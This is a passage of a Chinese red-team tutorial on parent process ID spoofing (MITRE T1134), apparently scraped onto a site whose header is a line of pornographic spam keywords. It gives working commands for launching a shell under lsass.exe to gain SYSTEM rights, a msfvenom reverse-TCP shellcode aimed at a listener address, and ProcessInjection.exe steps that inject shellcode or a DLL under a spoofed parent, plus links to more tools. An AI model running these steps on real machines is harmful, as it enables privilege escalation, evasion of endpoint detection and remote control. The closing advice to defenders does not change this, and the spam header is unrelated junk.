人妻丝袜美腿中文字幕乱一区三区-天天爽夜夜爽夜夜爽-摸 透 干 奶 流 操 逼-中文字幕一区二区色婷婷-免费特黄一级欧美大片在线看-91久久福利国产成人精品-久久精品人人爽人人做97-亚洲深喉一区二区在线看片-久久中文字幕无码不卡

  1. 首頁 > 經(jīng)驗(yàn)知識 > >

T1134 紅隊技術(shù)-父進(jìn)程欺騙( 三 )

生活經(jīng)驗(yàn)紅隊


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
可以看到在lsass.exe下成功創(chuàng)建了子進(jìn)程,因?yàn)閘sass.exe是system權(quán)限,所以反彈shell也獲取到了system權(quán)限 。
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
方法四(使用C#程序進(jìn)行PID欺騙)
py7hagoras開發(fā)了GetSystem項目,是上述技術(shù)的C#實(shí)現(xiàn),可以在這里找到:***/py7hagoras/GetSystem.git
在目標(biāo)機(jī)上下載GetSystem.exe,然后執(zhí)行GetSystem.exe 自定義程序 -O 目標(biāo)進(jìn)程名
GetSystem.exe shell.exe -O lsass
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
注意:這里可能也需要繞過UAC或者提權(quán),不然執(zhí)行不成功 。
方法五(通過PID欺騙注入Shellcode)
Chirag Savla 使用 C# 開發(fā)了一個名為“ProcessInjection”的出色工具,它可以執(zhí)行許多功能,包括通過 PID 欺騙進(jìn)行的進(jìn)程注入 。通過提供有效的 PID,該工具會嘗試使用 CreateProcess 等原生 API 調(diào)用來欺騙 PID,然后將代碼注入其中 。該工具支持 hex、C 和 base64 格式的shellcode ,也可以選擇 DLL 注入 。工具在這里下載:***/3xpl01tc0d3r/ProcessInjection
首先,使用msfvenom創(chuàng)建一個shellcode代碼
msfvenom -p windows/x64/shell_reverse_tcp -exitfunc=thread LHOST=172.19.218.248 LPORT=7777 -f hex > /hex.txt然后在目標(biāo)機(jī)中下載
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
使用ProcessInjection.exe進(jìn)行注入
ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"hex.txt" /parentproc:explorer /f:hex /t:1參數(shù)說明:
/ppath:目標(biāo) EXE 的進(jìn)程路徑(需要注入進(jìn)程的路徑)
/path:shellcode文件路徑
/parentproc:父進(jìn)程名稱,目標(biāo)EXE應(yīng)在此進(jìn)程下生成
/f:shellcode文件類型
/t:注入技術(shù)
支持的五種注入方式:
1) Vanilla Process Injection
2) DLL Injection
3) Process Hollowing
4) APC Queue
5) Dynamic Invoke - Vanilla Process Injection

T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
我們可以看到calc.exe在explorer.exe下,而shellcode則在calc.exe中執(zhí)行 。
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖
也可以進(jìn)行DLL注入
ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"shell.dll" /parentproc:explorer /t:2
T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


T1134 紅隊技術(shù)-父進(jìn)程欺騙

文章插圖


其他工具
***/Mr-Un1k0d3r/RemoteProcessInjection
***/xpn/getsystem-offline
***/hlldz/APC-PPID
***/ewilded/PPID_spoof
***/christophetd/spoofing-office-macro (VBA實(shí)現(xiàn))
在Metasploit中Meterpreter 可以使用migrate命令或者后滲透模塊post/windows/manage/migrate也可以實(shí)現(xiàn)進(jìn)程遷移 。
總結(jié)
攻擊者廣泛使用該技術(shù)進(jìn)行檢測規(guī)避,并增加了應(yīng)急響應(yīng)人員檢測IoC的時間 。針對許多過時的和未打補(bǔ)丁的EDR解決方案,可以使用此技術(shù)輕松規(guī)避檢測 。通過本文,告訴大家在組織中應(yīng)該使用最新的EDR解決方案以及在可以捕捉此類技術(shù)的優(yōu)質(zhì)產(chǎn)品中使用智能檢測功能的重要性 。

推薦閱讀